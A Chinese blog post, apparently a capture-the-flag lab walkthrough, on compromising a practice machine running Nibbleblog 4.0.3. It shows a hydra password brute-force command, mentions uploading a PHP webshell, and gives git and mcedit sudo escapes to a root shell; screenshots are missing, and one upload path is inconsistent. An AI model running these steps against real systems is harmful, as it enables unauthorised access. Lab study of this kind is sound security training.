0
点赞
收藏
分享

微信扫一扫

靶机渗透 blog

认真的老去 2022-03-12 阅读 92
  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

  3. 目录扫描

    在 /my_weblog 目录下

    在这里插入图片描述

    访问 README

    在这里插入图片描述

    发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞

    在这里插入图片描述

    需要使用到后台的账号密码

  4. 账号爆破

    hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect"
    

    在这里插入图片描述

  5. 自动测试失败,手动测试

    在这里插入图片描述

    上传一句话木马

    在这里插入图片描述

    通过 /wp_weblog/content/private/plugins/mu_image/image.php 连接

    在这里插入图片描述

    这里还需要绕过 disable_function

  6. 执行 sudo -l

    在这里插入图片描述

    使用 git 提权到 admin 用户

    sudo -u admin git -p help config
    !/bin/sh
    

    在这里插入图片描述

    admin 用户 可以以 root 用户执行 mcedit

    在这里插入图片描述

    使用 mcedit 提权

    sudo mcedit
    

    左上角点击 User menu…

    在这里插入图片描述

    在这里插入图片描述

举报

相关推荐

0 条评论